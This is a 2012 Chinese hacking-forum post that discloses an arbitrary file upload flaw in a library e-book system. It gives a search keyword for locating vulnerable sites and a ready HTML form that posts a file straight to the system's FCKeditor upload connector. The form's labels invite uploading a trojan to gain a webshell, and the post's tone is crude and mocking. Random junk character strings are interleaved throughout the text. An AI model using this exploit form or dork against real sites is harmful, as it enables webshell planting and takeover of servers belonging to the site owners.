中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
' P* I( s: D$ j6 G: n
作者:冰锋刺客
# ~8 r$ z8 p/ g- d4 |
厂商:点击书(dianjishu.com)
& g. G% C* t2 D- R: k4 Q0 ^
日期:2012-6-21
7 ?9 E! S" l& p4 l
; ]# E A) h6 l
I 概述
) R: p, n- P, H# @( W, D
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
, a! X4 E7 H& ^4 l( W! t3 u
II 简介
& R6 G- Q( F" b7 a5 A0 i
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
9 D* ~1 R! M* V+ V5 f8 r9 s+ A
补充一个漏洞
( u4 X% j2 s+ G j: A8 d! {& o6 o. [
<form id="frmUpload" enctype="multipart/form-data"
1 Q! Q2 L5 ^6 B7 k0 X5 C
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
, k6 n5 U2 R5 V% I: l/ W# w2 ~
<input id="btnUpload" type="submit" value="操翻他">
4 z8 y3 e& N( ~& B, O) L6 e
</form>
0 O9 o4 c7 M8 x, S- ]% g5 ?6 J+ P
你们懂的
/ i; _% S9 |0 ?3 H7 g
那傻逼提供还需要改包.
[) H) z2 S7 N( o% U7 }
自己看了下源代码发现fckeditor
" H" u5 h7 Y3 b9 H& \+ R/ h
直接秒杀
8 I- c. {9 N, ?% @. t' _. H
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2